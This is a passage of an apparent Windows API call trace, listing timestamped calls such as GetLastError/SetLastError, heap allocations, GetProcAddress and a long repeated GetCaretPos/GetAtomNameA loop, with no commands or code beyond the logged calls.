GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.973] SetLastError (dwErrCode=0x0) [0200.973] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.974] SetLastError (dwErrCode=0x0) [0200.974] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x7e) returned 0x20319b0 [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.975] SetLastError (dwErrCode=0x0) [0200.975] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.976] GetLastError () returned 0x0 [0200.976] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.977] SetLastError (dwErrCode=0x0) [0200.977] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.978] SetLastError (dwErrCode=0x0) [0200.978] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.979] SetLastError (dwErrCode=0x0) [0200.979] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.980] SetLastError (dwErrCode=0x0) [0200.980] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.981] SetLastError (dwErrCode=0x0) [0200.981] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.982] SetLastError (dwErrCode=0x0) [0200.982] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.983] GetLastError () returned 0x0 [0200.983] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] GetLastError () returned 0x0 [0200.984] SetLastError (dwErrCode=0x0) [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x9c) returned 0x2031a38 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1f) returned 0x2031ae0 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x36) returned 0x2031b08 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x37) returned 0x2031b48 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x3c) returned 0x2031b88 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x31) returned 0x2031bd0 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2031c10 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x24) returned 0x2031c30 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x14) returned 0x2031c60 [0200.984] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xd) returned 0x2031c80 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x25) returned 0x2031c98 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x39) returned 0x2031cc8 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2031d10 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2031d30 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xe) returned 0x2031d50 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x69) returned 0x2031d68 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x3e) returned 0x2031de0 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1b) returned 0x2031e28 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1d) returned 0x2031e50 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x48) returned 0x2031e78 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x12) returned 0x2031ec8 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2031ee8 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1b) returned 0x2031f08 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x24) returned 0x2031f30 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x29) returned 0x2031f60 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1e) returned 0x2031f98 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x41) returned 0x2031fc0 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2032010 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x14) returned 0x2032030 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xf) returned 0x2032050 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x16) returned 0x2032068 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x2a) returned 0x2032088 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x29) returned 0x20320c0 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x15) returned 0x20320f8 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1e) returned 0x2032118 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x2a) returned 0x2032140 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x12) returned 0x2032178 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2032198 [0200.985] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x46) returned 0x20321b8 [0200.985] HeapFree (in: hHeap=0x2030000, dwFlags=0x0, lpMem=0x20311f8 | out: hHeap=0x2030000) returned 1 [0200.986] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74ea0000 [0200.986] GetProcAddress (hModule=0x74ea0000, lpProcName="IsProcessorFeaturePresent") returned 0x74eb5235 [0200.986] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0200.987] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x800) returned 0x2032208 [0200.987] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x80) returned 0x20311f8 [0200.987] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4056dc) returned 0x0 [0200.987] RtlSizeHeap (HeapHandle=0x2030000, Flags=0x0, MemoryPointer=0x20311f8) returned 0x80 [0200.988] GetLastError () returned 0x0 [0200.988] SetLastError (dwErrCode=0x0) [0200.988] GetLastError () returned 0x0 [0201.123] lstrlenA (lpString="") returned 0 [0201.123] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.123] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.123] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.123] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.124] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.124] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.125] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.125] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 